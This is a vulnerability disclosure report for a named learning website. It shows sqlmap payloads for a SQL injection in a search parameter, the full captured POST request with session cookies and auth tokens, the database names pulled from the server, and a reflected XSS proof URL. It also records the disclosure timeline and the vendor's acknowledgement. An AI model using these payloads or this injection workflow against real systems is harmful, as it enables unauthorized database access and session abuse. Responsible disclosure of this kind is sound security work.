2015-12-29: Details submitted to the vendor, awaiting vendor handling
2015-12-30: Vendor confirmed the issue; details disclosed to the vendor only
2016-01-09: Details disclosed to core white hats and relevant domain experts
2016-01-19: Details disclosed to regular white hats
2016-01-29: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public
I hear there's a gift -w-
The Title parameter is injectable. The request was saved as 1.txt (contents below) and fed to sqlmap:
sqlmap.py -r 1.txt
sqlmap identified the following injection point(s) with a total of 35 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Type=1&Title=1%' AND 3814=3814 AND '%'='

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Type=1&Title=1%' AND 8834=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8834=8834) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(112)+CHAR(113))) AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
1.txt
POST /ajax/ASP.PageClass,App_Web_music_box.aspx.5df98d44.rasgroeb.ashx?p=rh9WhGz6z8TvuTfEaIBgigE0VSKHuMJQLgFc5JoJ-Pk1&_method=PageSearchMusic&_session=no HTTP/1.1
Host: bulo.hujiang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bulo.hujiang.com/app/music/%E4%B9%9D%E6%9C%88%E6%88%90%E6%AE%87/
Content-Length: 15
Content-Type: text/plain; charset=UTF-8
Cookie: _hotlink_uid=145106436134329; HJ_UID=df16267f-4618-bdb7-5117-120f8f46f8e4; TRACKSITEMAP=3%2C6%2C10%2C20%2C45%2C57%2C63%2C65%2C73%2C13%2C; _REF=; _SREF_10=http%3A%2F%2Fdict.hjenglish.com%2F; hj_token=s_daa18e800e251e3438da5c32193df0c7|MTE5NThkOA==; hjd_ajax_Language2011=en; __utma=249109652.1433456460.1451064409.1451064409.1451204932.2; __utmz=249109652.1451064409.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _SREF_6=http%3A%2F%2Fbulo.hujiang.com%2Fmenu%2F; ClubAuth=B83651E902FAAE8B8BCB9F8190710155E8D75A6ED1FAFD340097CC3AA015E2353EF999F57AF8D6168B7A9350F2A301418EED19ADF39ADDB54D5455A8DC31A0D3CBDBE9CE4966EE80E73348897F59ECC4E969B9A7905DF270CC7FFB4A2081E5088C23301C11FA65B98568E0F9B06D45093917A5918FA777920C5399A5360F6BCD107CCD0A337C685C243A7615DCEB3666FB476A92795E58C34FE99F68A1C12348022A4B62; _SREF_45=http%3A%2F%2Fms.hujiang.com%2Fdiary%2F; adsNewsTrueId=1663; news=true; _SREF_3=http%3A%2F%2Fms.hujiang.com%2Fdiary%2F; HJ_SID=9ef28c01-e16c-df99-25fb-3b5b95108673; HJ_CST=0; HJ_SSID_3=9d7120eb-9c1d-8a5f-eb4a-7735bb40782b; HJ_CSST_3=0; BuloMusicControl=0; _hotlink_source_track=http%3A//dict.hjenglish.com/; HJ_SSID_10=842075f2-5881-ae37-4a08-34e032bb0ba2; HJ_CSST_10=0; ingFrameHeight=1664; cck_lasttime=1451238877019; cck_count=0; bulo_tips_201208_nc=%7B%22tc%22%3A0%2C%22cc%22%3A0%2C%22fc%22%3A0%2C%22ac%22%3A0%2C%22pc%22%3A0%2C%22sc%22%3A0%2C%22mc%22%3A0%2C%22nc%22%3A0%2C%22st_atme%22%3A0%2C%22st_answer%22%3A0%2C%22st_sys%22%3A0%7D
DNT: 1
Connection: keep-alive

Type=1&Title=1*
sqlmap.py -r 1.txt --dbs
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
available databases [16]:
[*] DBCenter
[*] hj_cms
[*] HJ_Cms_App
[*] HJ_CmsExam
[*] hj_cmsLog
[*] HJ_CmsLogHistory
[*] HJ_CMSZhong
[*] HJ_Dict_New
[*] HJ_External
[*] HJ_K12SEOTiKu
[*] HJ_Lexicon
[*] HJ_Movie
[*] master
[*] model
[*] msdb
[*] tempdb
In addition, a reflected XSS: http://t.hujiang.com/star/all/?key=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
As above.
You're more professional than I am -w-
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-12-30 13:16
Issue confirmed and being handled, thank you. The databases listed above do not involve important business system databases, so the rating is Medium.
None for now.